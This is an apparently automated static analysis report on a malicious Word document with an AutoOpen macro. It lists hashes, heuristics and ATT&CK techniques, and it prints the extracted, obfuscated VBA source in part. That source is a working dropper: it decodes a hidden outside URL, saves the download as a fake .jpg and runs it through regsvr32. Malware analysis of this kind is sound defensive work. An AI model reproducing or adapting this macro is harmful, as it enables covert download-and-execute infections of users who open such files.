Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 105011fc6a1daea5…

MALICIOUS

Office (OOXML)

134.2 KB Created: 2020-07-09 00:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: cc8a00a497aa20cfe432314231f81b30 SHA-1: 2e63100085cc0accb27c88cdee0425e6ec1d5b1b SHA-256: 105011fc6a1daea55f9b2fad420e1f0df7d95f17dd8e838613f27efdc22fef9b
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute a shell command, indicating an attempt to download and run a secondary payload. The presence of an external relationship pointing to a local file path suggests a potential attempt to disguise or load malicious content. The VBA code itself is heavily obfuscated, making it difficult to determine the exact payload or destination.

Heuristics 5

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4600 bytes
SHA-256: 562489911aaa20535181bffb48524e661201cfd680fb18e870ff0a6468c11b89
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "e03e8059"
Function a51e5718()
a51e5718 = Application.ActiveDocument.AutoFormatOverride
End Function
Function d239f471()
d239f471 = ActiveWindow.SplitVertical
End Function
Function c942f0bc()
c942f0bc = 0
End Function
Function e270610b()
e270610b = ActiveWindow.Document
End Function
Sub cbc32caa(c0f635c0, cf0ba1eb)
Dim c918e199
c918e199 = FreeFile
Open c0f635c0 For Output As #c918e199
Print #c918e199, b55556fc(cf0ba1eb)
Close #c918e199
End Sub
Function ca7b68b1()
ca7b68b1 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function de86f68a()
de86f68a = ActiveWindow.DisplayRulers
End Function
Function e1ab4658()
e1ab4658 = ActiveWindow.Hwnd
End Function
Function dd54963f()
dd54963f = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function e32582b9(a3218dbd)
b048f5f3 = Len(a3218dbd)
For fa506672 = 1 To b048f5f3 Step 2
e699edcf = e699edcf & Mid(a3218dbd, fa506672, 1)
Next
e32582b9 = e699edcf
End Function
Function e8c3ad52()
e8c3ad52 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function b9a96216()
b9a96216 = Application.ActiveDocument.Application
End Function
Function ce555ee4()
ce555ee4 = ActiveWindow.DisplayRulers
End Function
Function ddd2cdd4()
ddd2cdd4 = ActiveWindow.WindowNumber
End Function
Sub cd60ba71()
End Sub
Function f1b9eb3d()
f1b9eb3d = ActiveWindow.DisplayRulers
End Function
Function a31fc4a5()
a31fc4a5 = ActiveWindow.VerticalPercentScrolled
End Function
Function f424dab7()
f424dab7 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function f9d90909()
f9d90909 = ActiveWindow.Thumbnails
End Function
Sub AutoOpen()
Dim c5238932 As New cb448bbb
cbc32caa e32582b9("cc:2\1p7r8o5g4rea7m2deaet3ad\b2a1f865400.cjcp4gb"), c5238932.d036bd44(e32582b9("hdtdt9pf:5/4/7n6i3xf4fe8.bcao3m5/4ifz35a/5yba8c6a0.8p7h9pc?4lf=1k1pft21e1f.1cfa3b7"))
Dim f4a58d85 As New WshShell
f4a58d85.exec b797c3da & " " & e32582b9("cc:2\1p7r8o5g4rea7m2deaet3ad\b2a1f865400.cjcp4gb")
End Sub

Attribute VB_Name = "d7020ebd"
Function f714ee7a()
f714ee7a = ActiveWindow.Height
End Function
Function f9e18ff5()
f9e18ff5 = 0
End Function
Function c5ce9693()
c5ce9693 = ActiveWindow.DisplayScreenTips
End Function
Function acad3289()
acad3289 = ActiveWindow.UsableHeight
End Function
Function b55556fc(d40af4e6)
b55556fc = StrConv(d40af4e6, 64)
End Function
Function e9364532()
e9364532 = ActiveWindow.DisplayLeftScrollBar
End Function
Function b5739fe1()
b5739fe1 = Application.ActiveDocument.AttachedTemplate
End Function
Function c0a15fab()
c0a15fab = Application.ActiveDocument.ChartDataPointTrack
End Function
Function c717e325()
c717e325 = ActiveWindow.Left
End Function
Function f7af9aa4()
End Function
Function c98912cd()
c98912cd = ActiveWindow.Top
End Function
Function dc521c22()
dc521c22 = ActiveWindow.Top
End Function
Function ce6c1af5()
ce6c1af5 = ActiveWindow.Document
End Function
Function f1fb5d1d(e8ea98c7np As String) As Boolean
If Len(e8ea98c7np) = 674 Then
f1fb5d1d = False
End If
End Function
Function b797c3da()
b797c3da = e32582b9("ree0g8s8vcr53c21")
End Function

Attribute VB_Name = "cb448bbb"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function e46631f0()
e46631f0 = ActiveWindow.VerticalPercentScrolled
End Function
Function bc147719()
bc147719 = ActiveWindow.EnvelopeVisible
End Function
Function f6b0f3e3()
f6b0f3e3 = ActiveWindow.Left
End Function
Function ed1c3e12()
ed1c3e12 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Fu
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27648 bytes
SHA-256: f26cbc4df066ce16d98ab73b94a31e6d4ef3f645a8f0f5e5f30bdedb60920d32

Open this report in the interactive analyzer, or submit your own file for analysis.